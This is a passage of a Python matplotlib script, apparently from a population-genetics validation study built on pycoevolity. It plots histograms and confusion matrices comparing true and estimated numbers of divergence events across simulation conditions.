            ax.set_xlabel("True {0} (${1}$)".format(parameter_label, parameter_symbol))
            ax.set_ylabel("Estimated {0} ($\\hat{{{1}}}$)".format(parameter_label, parameter_symbol))
            if row_idx == 0:
                # Column header computed but currently not rendered (the
                # ax.text call below is commented out).
                root_shape, root_scale = get_root_gamma_parameters(root_alpha_setting)
                col_header = "$\\textrm{{\\sffamily Gamma}}({0}, {1})$".format(int(root_shape), root_scale)
                # ax.text(0.5, 1.0,
                #         col_header,
                #         horizontalalignment = "center",
                #         verticalalignment = "bottom",
                #         transform = ax.transAxes)
            if col_idx == last_col_idx:
                # Row label rendering disabled for this single-panel figure.
                pass
                # ax.text(1.0, 0.5,
                #         row_key,
                #         horizontalalignment = "left",
                #         verticalalignment = "center",
                #         rotation = 270.0,
                #         transform = ax.transAxes)
    gs.update(left = 0.19, right = 0.99, bottom = 0.14, top = 0.92)
    plot_dir = os.path.join(project_util.VAL_DIR, "plots")
    if not os.path.exists(plot_dir):
        os.mkdir(plot_dir)
    plot_path = os.path.join(plot_dir,
            "root-1000-500k-{0}-scatter.pdf".format(plot_file_prefix))
    plt.savefig(plot_path, dpi=600)
    _LOG.info("Plots written to {0!r}\n".format(plot_path))
def generate_histograms(
        parameters,
        parameter_label = "Number of variable sites",
        plot_file_prefix = None,
        parameter_discrete = True,
        range_key = "range",
        number_of_digits = 0,
        include_all_sizes_fixed = True,
        include_root_size_fixed = False,
        include_variable_only = True,
        linked_loci = None,
        row_indices = None):
    """Plot a grid of frequency histograms of ``parameters`` per condition.

    Each subplot is the pooled distribution of the requested result
    columns for one simulation condition; all subplots share the same
    x-range and bins, and their y-axes are equalized afterwards.

    Parameters
    ----------
    parameters : list of str
        Unique result-column names to pool.
    parameter_label : str
        Shared x-axis label for the figure.
    plot_file_prefix : str or None
        Output-file prefix; defaults to ``parameters[0]``.
    parameter_discrete : bool
        If True, values are parsed as ints and the x-range is truncated
        to integers.
    range_key : str
        Key into the pycoevolity summary dict used for the annotated
        interval (e.g. "range" or "qi_95").
    number_of_digits : int
        Decimal digits in the annotation.
    row_indices : list of int or None
        Subset of row keys to plot; defaults to all rows.

    Writes ``<VAL_DIR>/plots/<prefix>-histograms.pdf``.
    """
    _LOG.info("Generating histograms for {0}...".format(parameter_label))
    assert(len(parameters) == len(set(parameters)))
    if not plot_file_prefix:
        plot_file_prefix = parameters[0]
    # Patterns for parsing simulation settings out of directory names.
    root_alpha_pattern = re.compile(r'root-(?P<alpha_setting>\S+)-\d00k')
    locus_size_pattern = re.compile(r'root-\d+-\d00k-(?P<locus_size>\d+)u?l')
    row_keys, results_batches = get_results_paths(project_util.VAL_DIR,
            include_all_sizes_fixed = include_all_sizes_fixed,
            include_root_size_fixed = include_root_size_fixed,
            include_variable_only = include_variable_only)
    if linked_loci:
        row_keys, results_batches = get_linked_loci_results_paths(
                project_util.VAL_DIR,
                data_set_size = linked_loci,
                include_variable_only = include_variable_only,
                include_unlinked_only = True)
    if not row_indices:
        row_indices = list(range(len(row_keys)))
    # Very inefficient, but parsing all results to get min/max for the
    # parameter so every histogram shares one x-range (and set of bins).
    parameter_min = float('inf')
    parameter_max = float('-inf')
    for row_idx in row_indices:
        key = row_keys[row_idx]
        results_batch = results_batches[key]
        for sim_dir, results_paths in results_batch:
            results = pycoevolity.parsing.get_dict_from_spreadsheets(
                    results_paths,
                    sep = "\t",
                    offset = 0)
            for parameter_str in parameters:
                parameter_min = min(parameter_min,
                        min(float(v) for v in results["{0}".format(parameter_str)]))
                parameter_max = max(parameter_max,
                        max(float(v) for v in results["{0}".format(parameter_str)]))
    plt.close('all')
    nrows = len(row_indices)
    # NOTE: dict views are not indexable in Python 3, so use an iterator
    # instead of `results_batches.values()[0]`.
    ncols = len(next(iter(results_batches.values())))
    # Scale the figure size with the dimensions of the subplot grid.
    w = 1.6
    h = 1.5
    fig_width = (ncols * w) + 1.0
    fig_height = (nrows * h) + 0.7
    fig = plt.figure(figsize = (fig_width, fig_height))
    gs = gridspec.GridSpec(nrows, ncols,
            wspace = 0.0,
            hspace = 0.0)
    # Bins are taken from the first histogram drawn and reused so that
    # all subplots are binned identically.
    hist_bins = None
    for fig_row_idx, row_idx in enumerate(row_indices):
        row_key = row_keys[row_idx]
        results_batch = results_batches[row_key]
        last_col_idx = len(results_batch) - 1
        for col_idx, (sim_dir, results_paths) in enumerate(results_batch):
            root_alpha_matches = root_alpha_pattern.findall(sim_dir)
            assert(len(root_alpha_matches) == 1)
            root_alpha_setting = root_alpha_matches[0]
            results = pycoevolity.parsing.get_dict_from_spreadsheets(
                    results_paths,
                    sep = "\t",
                    offset = 0)
            _LOG.info("row {0}, col {1} : {2} ({3} batches)".format(
                    fig_row_idx, col_idx, sim_dir, len(results_paths)))
            # Pool values across all requested parameters.
            x = []
            for parameter_str in parameters:
                if parameter_discrete:
                    x.extend(int(v) for v in results["{0}".format(parameter_str)])
                else:
                    x.extend(float(v) for v in results["{0}".format(parameter_str)])
            summary = pycoevolity.stats.get_summary(x)
            _LOG.info("0.025, 0.975 quantiles: {0:.2f}, {1:.2f}".format(
                    summary["qi_95"][0],
                    summary["qi_95"][1]))
            x_range = (parameter_min, parameter_max)
            if parameter_discrete:
                x_range = (int(parameter_min), int(parameter_max))
            ax = plt.subplot(gs[fig_row_idx, col_idx])
            # Weight each observation by 1/N so bar heights are frequencies.
            n, bins, patches = ax.hist(x,
                    weights = [1.0 / float(len(x))] * len(x),
                    bins = hist_bins,
                    range = x_range,
                    cumulative = False,
                    histtype = 'bar',
                    align = 'mid',
                    orientation = 'vertical',
                    rwidth = None,
                    log = False,
                    color = None,
                    edgecolor = '0.5',
                    facecolor = '0.5',
                    fill = True,
                    hatch = None,
                    label = None,
                    linestyle = None,
                    linewidth = None,
                    zorder = 10,
                    )
            if hist_bins is None:
                hist_bins = bins
            # Annotate with the mean and the chosen summary interval.
            ax.text(0.98, 0.98,
                    "\\scriptsize {mean:,.{ndigits}f} ({lower:,.{ndigits}f}--{upper:,.{ndigits}f})".format(
                            mean = summary["mean"],
                            lower = summary[range_key][0],
                            upper = summary[range_key][1],
                            ndigits = number_of_digits),
                    horizontalalignment = "right",
                    verticalalignment = "top",
                    transform = ax.transAxes,
                    zorder = 200)
            if fig_row_idx == 0:
                # Column headers describe the simulation condition.
                if linked_loci:
                    locus_size_matches = locus_size_pattern.findall(sim_dir)
                    assert len(locus_size_matches) == 1
                    locus_size = int(locus_size_matches[0])
                    col_header = "$\\textrm{{\\sffamily Locus length}} = {0}$".format(locus_size)
                else:
                    if root_alpha_setting == "fixed-all":
                        pop_sizes = results["mean_pop_size_c1sp1"]
                        assert(len(set(pop_sizes)) == 1)
                        col_header = "$\\textrm{{\\sffamily All sizes}} = {0}$".format(pop_sizes[0])
                    elif root_alpha_setting == "fixed":
                        col_header = "$\\textrm{{\\sffamily Root size}} = 1.0$"
                    else:
                        root_shape, root_scale = get_root_gamma_parameters(root_alpha_setting)
                        col_header = "$\\textrm{{\\sffamily Gamma}}({0}, {1})$".format(int(root_shape), root_scale)
                ax.text(0.5, 1.015,
                        col_header,
                        horizontalalignment = "center",
                        verticalalignment = "bottom",
                        transform = ax.transAxes)
            if (col_idx == last_col_idx) and (nrows > 1):
                # Row labels along the right edge (only for multi-row grids).
                ax.text(1.015, 0.5,
                        row_key,
                        horizontalalignment = "left",
                        verticalalignment = "center",
                        rotation = 270.0,
                        transform = ax.transAxes)
    # make sure y-axis is the same across all subplots
    y_max = float('-inf')
    all_axes = fig.get_axes()
    for ax in all_axes:
        ymn, ymx = ax.get_ylim()
        y_max = max(y_max, ymx)
    for ax in all_axes:
        ax.set_ylim(0.0, y_max)
    # show only the outside ticks
    all_axes = fig.get_axes()
    for ax in all_axes:
        if not ax.is_last_row():
            ax.set_xticks([])
        if not ax.is_first_col():
            ax.set_yticks([])
    # show tick labels only for lower-left plot
    all_axes = fig.get_axes()
    for ax in all_axes:
        if ax.is_last_row() and ax.is_first_col():
            continue
        xtick_labels = ["" for item in ax.get_xticklabels()]
        ytick_labels = ["" for item in ax.get_yticklabels()]
        ax.set_xticklabels(xtick_labels)
        ax.set_yticklabels(ytick_labels)
    # avoid doubled spines
    all_axes = fig.get_axes()
    for ax in all_axes:
        for sp in ax.spines.values():
            sp.set_visible(False)
            sp.set_linewidth(2)
        if ax.is_first_row():
            ax.spines['top'].set_visible(True)
            ax.spines['bottom'].set_visible(True)
        else:
            ax.spines['bottom'].set_visible(True)
        if ax.is_first_col():
            ax.spines['left'].set_visible(True)
            ax.spines['right'].set_visible(True)
        else:
            ax.spines['right'].set_visible(True)
    # Shared axis labels for the whole figure.
    fig.text(0.5, 0.001,
            parameter_label,
            horizontalalignment = "center",
            verticalalignment = "bottom",
            size = 18.0)
    fig.text(0.005, 0.5,
            "Frequency",
            horizontalalignment = "left",
            verticalalignment = "center",
            rotation = "vertical",
            size = 18.0)
    # Margins tuned per layout; linked-loci settings override the defaults.
    if nrows == 1:
        gs.update(left = 0.08, right = 0.995, bottom = 0.17, top = 0.92)
    else:
        gs.update(left = 0.07, right = 0.98, bottom = 0.08, top = 0.97)
    if linked_loci:
        if nrows == 3:
            gs.update(left = 0.10, right = 0.97, bottom = 0.09, top = 0.97)
        else:
            gs.update(left = 0.11, right = 0.97, bottom = 0.12, top = 0.95)
    plot_dir = os.path.join(project_util.VAL_DIR, "plots")
    if not os.path.exists(plot_dir):
        os.mkdir(plot_dir)
    plot_path = os.path.join(plot_dir,
            "{0}-histograms.pdf".format(plot_file_prefix))
    plt.savefig(plot_path)
    _LOG.info("Plots written to {0!r}\n".format(plot_path))
def generate_model_plots(
        number_of_comparisons = 3,
        include_all_sizes_fixed = True,
        include_root_size_fixed = False,
        linked_loci = None,
        missing_data = False,
        filtered_data = False,
        include_variable_only = True,
        show_all_models = False):
    """Plot grids of true-vs-MAP confusion matrices for model inference.

    By default each subplot is a ``number_of_comparisons`` x
    ``number_of_comparisons`` matrix of counts comparing the true number
    of divergence events against the MAP estimate.  With
    ``show_all_models`` (3 comparisons only) a 5x5 matrix over the five
    set partitions of the comparisons is plotted instead.  At most one
    of ``linked_loci``, ``missing_data``, or ``filtered_data`` may be
    given to select an alternative set of validation results.

    The figure is written under ``<VAL_DIR>/plots/`` with a name derived
    from the selected data set and plot type.
    """
    if show_all_models and (number_of_comparisons != 3):
        raise Exception("show all models only supported for 3 comparisons")
    # The three alternative data-set selectors are mutually exclusive.
    if int(bool(linked_loci)) + int(missing_data) + int(filtered_data) > 1:
        raise Exception("Can only specify linked_loci, missing_data, or filtered_data")
    _LOG.info("Generating model plots...")
    # Patterns for parsing simulation settings out of directory names.
    root_alpha_pattern = re.compile(r'root-(?P<alpha_setting>\S+)-\d00k')
    locus_size_pattern = re.compile(r'root-\d+-\d00k-(?P<locus_size>\d+)l')
    missing_data_pattern = re.compile(r'root-\d+-\d00k-0(?P<p_missing>\d+)missing')
    filtered_data_pattern = re.compile(r'root-\d+-\d00k-0(?P<p_singleton>\d+)singleton')
    cmap = truncate_color_map(plt.cm.binary, 0.0, 0.65, 100)
    row_keys, results_batches = get_results_paths(project_util.VAL_DIR,
            include_all_sizes_fixed = include_all_sizes_fixed,
            include_root_size_fixed = include_root_size_fixed,
            include_variable_only = include_variable_only)
    if linked_loci:
        row_keys, results_batches = get_linked_loci_results_paths(
                project_util.VAL_DIR,
                data_set_size = linked_loci,
                include_variable_only = include_variable_only,
                include_unlinked_only = True)
    if missing_data:
        row_keys, results_batches = get_missing_data_results_paths(
                project_util.VAL_DIR,
                include_variable_only = include_variable_only)
    if filtered_data:
        row_keys, results_batches = get_filtered_data_results_paths(
                project_util.VAL_DIR,
                include_variable_only = include_variable_only)
    plt.close('all')
    # Figure dimensions depend on which grid of conditions is plotted.
    if missing_data or filtered_data:
        fig = plt.figure(figsize = (9, 4.0))
    elif linked_loci:
        if include_variable_only:
            fig = plt.figure(figsize = (7.25, 6.5))
        else:
            fig = plt.figure(figsize = (7.25, 4.6))
    else:
        fig = plt.figure(figsize = (9, 6.5))
    nrows = len(results_batches)
    # NOTE: dict views are not indexable in Python 3, so use an iterator
    # instead of `results_batches.values()[0]`.
    ncols = len(next(iter(results_batches.values())))
    gs = gridspec.GridSpec(nrows, ncols,
            wspace = 0.0,
            hspace = 0.0)
    # The five possible divergence models (set partitions) of 3 comparisons.
    model_to_index = {
            "000": 0,
            "001": 1,
            "010": 2,
            "011": 3,
            "012": 4,
    }
    index_to_model = {v: k for k, v in model_to_index.items()}
    for row_idx, row_key in enumerate(row_keys):
        results_batch = results_batches[row_key]
        last_col_idx = len(results_batch) - 1
        for col_idx, (sim_dir, results_paths) in enumerate(results_batch):
            root_alpha_matches = root_alpha_pattern.findall(sim_dir)
            assert(len(root_alpha_matches) == 1)
            root_alpha_setting = root_alpha_matches[0]
            results = pycoevolity.parsing.get_dict_from_spreadsheets(
                    results_paths,
                    sep = "\t",
                    offset = 0)
            _LOG.info("row {0}, col {1} : {2} ({3} batches)".format(
                    row_idx, col_idx, sim_dir, len(results_paths)))
            # Confusion matrices: first index is the MAP estimate, second
            # is the truth.
            true_map_nevents = []
            true_map_model = []
            true_map_nevents_probs = []
            for i in range(number_of_comparisons):
                true_map_nevents.append([0 for i in range(number_of_comparisons)])
                true_map_nevents_probs.append([[] for i in range(number_of_comparisons)])
            for i in range(5):
                true_map_model.append([0 for i in range(5)])
                # NOTE(review): this pads `true_map_nevents_probs` with five
                # extra rows beyond the `number_of_comparisons` used above;
                # only the first `number_of_comparisons` rows are ever
                # indexed, so the padding is harmless, but it looks like a
                # copy-paste leftover — confirm intent.
                true_map_nevents_probs.append([[] for i in range(5)])
            true_nevents = tuple(int(x) for x in results["true_num_events"])
            map_nevents = tuple(int(x) for x in results["map_num_events"])
            true_model = tuple(x for x in results["true_model"])
            map_model = tuple(x for x in results["map_model"])
            true_nevents_cred_levels = tuple(float(x) for x in results["true_num_events_cred_level"])
            true_model_cred_levels = tuple(float(x) for x in results["true_model_cred_level"])
            assert(len(true_nevents) == len(map_nevents))
            assert(len(true_nevents) == len(true_nevents_cred_levels))
            assert(len(true_nevents) == len(true_model_cred_levels))
            assert(len(true_nevents) == len(true_model))
            assert(len(true_nevents) == len(map_model))
            # Posterior probabilities of the true and MAP number of events
            # for each simulation replicate.
            true_nevents_probs = []
            map_nevents_probs = []
            for i in range(len(true_nevents)):
                true_nevents_probs.append(float(
                        results["num_events_{0}_p".format(true_nevents[i])][i]))
                map_nevents_probs.append(float(
                        results["num_events_{0}_p".format(map_nevents[i])][i]))
            assert(len(true_nevents) == len(true_nevents_probs))
            assert(len(true_nevents) == len(map_nevents_probs))
            median_true_nevents_prob = pycoevolity.stats.median(true_nevents_probs)
            true_model_probs = tuple(float(x) for x in results["true_model_p"])
            assert(len(true_nevents) == len(true_model_probs))
            median_true_model_prob = pycoevolity.stats.median(true_model_probs)
            # Tally credible-set coverage and MAP accuracy over replicates.
            nevents_within_95_cred = 0
            model_within_95_cred = 0
            ncorrect = 0
            model_ncorrect = 0
            for i in range(len(true_nevents)):
                true_map_nevents[map_nevents[i] - 1][true_nevents[i] - 1] += 1
                true_map_nevents_probs[map_nevents[i] - 1][true_nevents[i] - 1].append(map_nevents_probs[i])
                if show_all_models:
                    true_map_model[model_to_index[map_model[i]]][model_to_index[true_model[i]]] += 1
                if true_nevents_cred_levels[i] <= 0.95:
                    nevents_within_95_cred += 1
                if true_model_cred_levels[i] <= 0.95:
                    model_within_95_cred += 1
                if true_nevents[i] == map_nevents[i]:
                    ncorrect += 1
                if true_model[i] == map_model[i]:
                    model_ncorrect += 1
            p_nevents_within_95_cred = nevents_within_95_cred / float(len(true_nevents))
            p_model_within_95_cred = model_within_95_cred / float(len(true_nevents))
            p_correct = ncorrect / float(len(true_nevents))
            p_model_correct = model_ncorrect / float(len(true_nevents))
            _LOG.info("p(nevents within CS) = {0:.4f}".format(p_nevents_within_95_cred))
            _LOG.info("p(model within CS) = {0:.4f}".format(p_model_within_95_cred))
            ax = plt.subplot(gs[row_idx, col_idx])
            if show_all_models:
                # Heat map over the 5x5 model confusion matrix.
                ax.imshow(true_map_model,
                        origin = 'lower',
                        cmap = cmap,
                        interpolation = 'none',
                        aspect = 'auto'
                        )
                # Print the count in each cell.
                for i, row_list in enumerate(true_map_model):
                    for j, n in enumerate(row_list):
                        ax.text(j, i,
                                str(n),
                                horizontalalignment = "center",
                                verticalalignment = "center",
                                fontsize = 6)
                ax.text(0.98, 0.01,
                        "\\tiny$p(\\mathcal{{T}} \\in \\textrm{{\\sffamily CS}}) = {0:.3f}$".format(
                                p_model_within_95_cred),
                        horizontalalignment = "right",
                        verticalalignment = "bottom",
                        transform = ax.transAxes)
                ax.text(0.02, 1.01,
                        "\\tiny$p(\\hat{{\\mathcal{{T}}}} = \\mathcal{{T}}) = {0:.3f}$".format(
                                p_model_correct),
                        horizontalalignment = "left",
                        verticalalignment = "top",
                        transform = ax.transAxes)
                ax.text(0.98, 1.01,
                        "\\tiny$\\widetilde{{p(\\mathcal{{T}}|\\mathbf{{D}})}} = {0:.3f}$".format(
                                median_true_model_prob),
                        horizontalalignment = "right",
                        verticalalignment = "top",
                        transform = ax.transAxes)
            else:
                # Heat map over the number-of-events confusion matrix.
                ax.imshow(true_map_nevents,
                        origin = 'lower',
                        cmap = cmap,
                        interpolation = 'none',
                        aspect = 'auto'
                        )
                # Print the count in each cell.
                for i, row_list in enumerate(true_map_nevents):
                    for j, num_events in enumerate(row_list):
                        ax.text(j, i,
                                str(num_events),
                                horizontalalignment = "center",
                                verticalalignment = "center")
                ax.text(0.98, 0.02,
                        "\\scriptsize$p(k \\in \\textrm{{\\sffamily CS}}) = {0:.3f}$".format(
                                p_nevents_within_95_cred),
                        horizontalalignment = "right",
                        verticalalignment = "bottom",
                        transform = ax.transAxes)
                ax.text(0.02, 0.98,
                        "\\scriptsize$p(\\hat{{k}} = k) = {0:.3f}$".format(
                                p_correct),
                        horizontalalignment = "left",
                        verticalalignment = "top",
                        transform = ax.transAxes)
                ax.text(0.98, 0.98,
                        "\\scriptsize$\\widetilde{{p(k|\\mathbf{{D}})}} = {0:.3f}$".format(
                                median_true_nevents_prob),
                        horizontalalignment = "right",
                        verticalalignment = "top",
                        transform = ax.transAxes)
            if row_idx == 0:
                # Column headers describe the simulation condition, parsed
                # from the simulation directory name.
                if linked_loci:
                    locus_size_matches = locus_size_pattern.findall(sim_dir)
                    assert len(locus_size_matches) == 1
                    locus_size = int(locus_size_matches[0])
                    col_header = "$\\textrm{{\\sffamily Locus length}} = {0}$".format(locus_size)
                elif missing_data:
                    percent_missing = 0.0
                    missing_matches = missing_data_pattern.findall(sim_dir)
                    if missing_matches:
                        assert len(missing_matches) == 1
                        percent_missing = float("." + missing_matches[0]) * 100.0
                    col_header = "{0:.0f}\\% missing data".format(percent_missing)
                elif filtered_data:
                    percent_sampled = 100.0
                    filtered_matches = filtered_data_pattern.findall(sim_dir)
                    if filtered_matches:
                        assert len(filtered_matches) == 1
                        percent_sampled = float("." + filtered_matches[0]) * 100.0
                    col_header = "{0:.0f}\\% singleton patterns".format(percent_sampled)
                else:
                    if root_alpha_setting == "fixed-all":
                        pop_sizes = results["mean_pop_size_c1sp1"]
                        assert(len(set(pop_sizes)) == 1)
                        col_header = "$\\textrm{{\\sffamily All sizes}} = {0}$".format(pop_sizes[0])
                    elif root_alpha_setting == "fixed":
                        col_header = "$\\textrm{{\\sffamily Root size}} = 1.0$"
                    else:
                        root_shape, root_scale = get_root_gamma_parameters(root_alpha_setting)
                        col_header = "$\\textrm{{\\sffamily Gamma}}({0}, {1})$".format(int(root_shape), root_scale)
                ax.text(0.5, 1.015,
                        col_header,
                        horizontalalignment = "center",
                        verticalalignment = "bottom",
                        transform = ax.transAxes)
            if col_idx == last_col_idx:
                # Row labels go along the right edge of the grid.
                ax.text(1.015, 0.5,
                        row_key,
                        horizontalalignment = "left",
                        verticalalignment = "center",
                        rotation = 270.0,
                        transform = ax.transAxes)
    # show only the outside ticks
    all_axes = fig.get_axes()
    for ax in all_axes:
        if not ax.is_last_row():
            ax.set_xticks([])
        if not ax.is_first_col():
            ax.set_yticks([])
    # show tick labels only for lower-left plot
    all_axes = fig.get_axes()
    for ax in all_axes:
        # Make sure ticks correspond only with the number of events (or
        # with the five models when all models are shown).
        if not show_all_models:
            ax.xaxis.set_ticks(range(number_of_comparisons))
            ax.yaxis.set_ticks(range(number_of_comparisons))
        else:
            ax.xaxis.set_ticks(range(5))
            ax.yaxis.set_ticks(range(5))
        if ax.is_last_row() and ax.is_first_col():
            xtick_labels = [item for item in ax.get_xticklabels()]
            for i in range(len(xtick_labels)):
                if show_all_models:
                    xtick_labels[i].set_text(index_to_model[i])
                else:
                    xtick_labels[i].set_text(str(i + 1))
            ytick_labels = [item for item in ax.get_yticklabels()]
            for i in range(len(ytick_labels)):
                if show_all_models:
                    ytick_labels[i].set_text(index_to_model[i])
                else:
                    ytick_labels[i].set_text(str(i + 1))
            ax.set_xticklabels(xtick_labels)
            ax.set_yticklabels(ytick_labels)
        else:
            xtick_labels = ["" for item in ax.get_xticklabels()]
            ytick_labels = ["" for item in ax.get_yticklabels()]
            ax.set_xticklabels(xtick_labels)
            ax.set_yticklabels(ytick_labels)
    # avoid doubled spines
    all_axes = fig.get_axes()
    for ax in all_axes:
        for sp in ax.spines.values():
            sp.set_visible(False)
            sp.set_linewidth(2)
        if ax.is_first_row():
            ax.spines['top'].set_visible(True)
            ax.spines['bottom'].set_visible(True)
        else:
            ax.spines['bottom'].set_visible(True)
        if ax.is_first_col():
            ax.spines['left'].set_visible(True)
            ax.spines['right'].set_visible(True)
        else:
            ax.spines['right'].set_visible(True)
    # Shared axis labels for the whole figure.
    if show_all_models:
        fig.text(0.5, 0.001,
                "True model ($\\mathcal{{T}}$)",
                horizontalalignment = "center",
                verticalalignment = "bottom",
                size = 18.0)
        fig.text(0.005, 0.5,
                "MAP model ($\\hat{{\\mathcal{{T}}}}$)",
                horizontalalignment = "left",
                verticalalignment = "center",
                rotation = "vertical",
                size = 18.0)
    else:
        fig.text(0.5, 0.001,
                "True number of events ($k$)",
                horizontalalignment = "center",
                verticalalignment = "bottom",
                size = 18.0)
        fig.text(0.005, 0.5,
                "MAP number of events ($\\hat{{k}}$)",
                horizontalalignment = "left",
                verticalalignment = "center",
                rotation = "vertical",
                size = 18.0)
    # Margins tuned per figure layout.
    if missing_data or filtered_data:
        gs.update(left = 0.08, right = 0.98, bottom = 0.1, top = 0.96)
    elif linked_loci:
        if include_variable_only:
            gs.update(left = 0.08, right = 0.97, bottom = 0.08, top = 0.97)
        else:
            if show_all_models:
                gs.update(left = 0.09, right = 0.97, bottom = 0.13, top = 0.95)
            else:
                gs.update(left = 0.08, right = 0.97, bottom = 0.13, top = 0.95)
    else:
        gs.update(left = 0.08, right = 0.98, bottom = 0.08, top = 0.97)
    plot_dir = os.path.join(project_util.VAL_DIR, "plots")
    plot_type = "nevents"
    if show_all_models:
        plot_type = "models"
    if not os.path.exists(plot_dir):
        os.mkdir(plot_dir)
    # Output name encodes the selected data set and plot type.
    if linked_loci:
        if include_variable_only:
            plot_path = os.path.join(plot_dir,
                    "linkage-{0}-{1}.pdf".format(linked_loci, plot_type))
        else:
            plot_path = os.path.join(plot_dir,
                    "linkage-{0}-{1}-no-vo.pdf".format(linked_loci, plot_type))
    elif missing_data:
        plot_path = os.path.join(plot_dir,
                "missing-data-{0}.pdf".format(plot_type))
    elif filtered_data:
        plot_path = os.path.join(plot_dir,
                "filtered-data-{0}.pdf".format(plot_type))
    else:
        plot_path = os.path.join(plot_dir,
                "{0}.pdf".format(plot_type))
    plt.savefig(plot_path)
    _LOG.info("Plots written to {0!r}\n".format(plot_path))
def generate_root_1000_500k_model_plots(
        number_of_comparisons = 3):
    """Plot a true-versus-MAP number-of-events confusion matrix for the
    'root-1000' 500k-site validation analyses.

    Parameters
    ----------
    number_of_comparisons : int
        Number of pairwise comparisons (and hence the maximum possible
        number of divergence events) in each simulated data set.

    Writes ``root-1000-500k-nevents.pdf`` into the ``plots`` subdirectory
    of ``project_util.VAL_DIR``.
    """
    _LOG.info("Generating model plots...")
    root_alpha_pattern = re.compile(r'root-(?P<alpha_setting>\S+)-\d00k')
    # NOTE(fix): a local re-assignment ``number_of_comparisons = 3`` used to
    # follow here and silently clobbered the keyword argument; it has been
    # removed so the parameter is honored (the default preserves behavior).
    # Two unused compiled patterns (``-dpp-``/``-rj-``) were also dropped.
    cmap = truncate_color_map(plt.cm.binary, 0.0, 0.65, 100)
    row_keys, results_batches = get_root_1000_500k_results_paths(project_util.VAL_DIR)
    plt.close('all')
    fig = plt.figure(figsize = (3.5, 3.3))
    nrows = 1
    ncols = 1
    gs = gridspec.GridSpec(nrows, ncols,
            wspace = 0.0,
            hspace = 0.0)
    for row_idx, row_key in enumerate(row_keys):
        results_batch = results_batches[row_key]
        for col_idx, (sim_dir, results_paths) in enumerate(results_batch):
            # The gamma-prior setting for the root size is encoded in the
            # simulation directory name; exactly one match is expected.
            root_alpha_matches = root_alpha_pattern.findall(sim_dir)
            assert(len(root_alpha_matches) == 1)
            root_alpha_setting = root_alpha_matches[0]
            results = pycoevolity.parsing.get_dict_from_spreadsheets(
                    results_paths,
                    sep = "\t",
                    offset = 0)
            _LOG.info("row {0}, col {1} : {2} ({3} batches)".format(
                    row_idx, col_idx, sim_dir, len(results_paths)))
            # Confusion matrix: row index = MAP nevents - 1,
            # column index = true nevents - 1.
            true_map_nevents = []
            true_map_nevents_probs = []
            for i in range(number_of_comparisons):
                true_map_nevents.append([0 for i in range(number_of_comparisons)])
                true_map_nevents_probs.append([[] for i in range(number_of_comparisons)])
            true_nevents = tuple(int(x) for x in results["true_num_events"])
            map_nevents = tuple(int(x) for x in results["map_num_events"])
            true_nevents_cred_levels = tuple(float(x) for x in results["true_num_events_cred_level"])
            true_model_cred_levels = tuple(float(x) for x in results["true_model_cred_level"])
            assert(len(true_nevents) == len(map_nevents))
            assert(len(true_nevents) == len(true_nevents_cred_levels))
            assert(len(true_nevents) == len(true_model_cred_levels))
            true_nevents_probs = []
            map_nevents_probs = []
            for i in range(len(true_nevents)):
                true_nevents_probs.append(float(
                        results["num_events_{0}_p".format(true_nevents[i])][i]))
                map_nevents_probs.append(float(
                        results["num_events_{0}_p".format(map_nevents[i])][i]))
            assert(len(true_nevents) == len(true_nevents_probs))
            assert(len(true_nevents) == len(map_nevents_probs))
            mean_true_nevents_prob = sum(true_nevents_probs) / len(true_nevents_probs)
            median_true_nevents_prob = pycoevolity.stats.median(true_nevents_probs)
            # Tally coverage (true value within the 95% credible set),
            # and how often the MAP estimate is exactly right.
            nevents_within_95_cred = 0
            model_within_95_cred = 0
            ncorrect = 0
            for i in range(len(true_nevents)):
                true_map_nevents[map_nevents[i] - 1][true_nevents[i] - 1] += 1
                true_map_nevents_probs[map_nevents[i] - 1][true_nevents[i] - 1].append(map_nevents_probs[i])
                if true_nevents_cred_levels[i] <= 0.95:
                    nevents_within_95_cred += 1
                if true_model_cred_levels[i] <= 0.95:
                    model_within_95_cred += 1
                if true_nevents[i] == map_nevents[i]:
                    ncorrect += 1
            p_nevents_within_95_cred = nevents_within_95_cred / float(len(true_nevents))
            p_model_within_95_cred = model_within_95_cred / float(len(true_nevents))
            p_correct = ncorrect / float(len(true_nevents))
            _LOG.info("p(nevents within CS) = {0:.4f}".format(p_nevents_within_95_cred))
            _LOG.info("p(model within CS) = {0:.4f}".format(p_model_within_95_cred))
            ax = plt.subplot(gs[row_idx, col_idx])
            ax.imshow(true_map_nevents,
                    origin = 'lower',
                    cmap = cmap,
                    interpolation = 'none',
                    aspect = 'auto'
                    )
            # Annotate each cell with its count.
            for i, row_list in enumerate(true_map_nevents):
                for j, num_events in enumerate(row_list):
                    ax.text(j, i,
                            str(num_events),
                            horizontalalignment = "center",
                            verticalalignment = "center")
            ax.text(0.01, 1.01,
                    "$p(\\hat{{k}} = k) = {0:.3f}$".format(
                            p_correct),
                    horizontalalignment = "left",
                    verticalalignment = "bottom",
                    transform = ax.transAxes)
            ax.text(0.99, 1.01,
                    "$\\widetilde{{p(k|\\mathbf{{D}})}} = {0:.3f}$".format(
                            median_true_nevents_prob),
                    horizontalalignment = "right",
                    verticalalignment = "bottom",
                    transform = ax.transAxes)
            ax.set_xlabel("True number of events ($k$)", labelpad = 8.0)
            ax.set_ylabel("Estimated number of events ($\\hat{{k}}$)", labelpad = 8.0)
            if row_idx == 0:
                # Column-header rendering is currently disabled; the values
                # are still computed so the label is easy to re-enable.
                root_shape, root_scale = get_root_gamma_parameters(root_alpha_setting)
                col_header = "$\\textrm{{\\sffamily Gamma}}({0}, {1})$".format(int(root_shape), root_scale)
    # show tick labels only for lower-left plot
    all_axes = fig.get_axes()
    for ax in all_axes:
        ax.xaxis.set_ticks(range(number_of_comparisons))
        ax.yaxis.set_ticks(range(number_of_comparisons))
        if ax.is_last_row() and ax.is_first_col():
            xtick_labels = [item for item in ax.get_xticklabels()]
            for i in range(len(xtick_labels)):
                xtick_labels[i].set_text(str(i + 1))
            ytick_labels = [item for item in ax.get_yticklabels()]
            for i in range(len(ytick_labels)):
                ytick_labels[i].set_text(str(i + 1))
            ax.set_xticklabels(xtick_labels)
            ax.set_yticklabels(ytick_labels)
        else:
            xtick_labels = ["" for item in ax.get_xticklabels()]
            ytick_labels = ["" for item in ax.get_yticklabels()]
            ax.set_xticklabels(xtick_labels)
            ax.set_yticklabels(ytick_labels)
    gs.update(left = 0.14, right = 0.99, bottom = 0.16, top = 0.92)
    plot_dir = os.path.join(project_util.VAL_DIR, "plots")
    if not os.path.exists(plot_dir):
        os.mkdir(plot_dir)
    plot_path = os.path.join(plot_dir,
            "root-1000-500k-nevents.pdf")
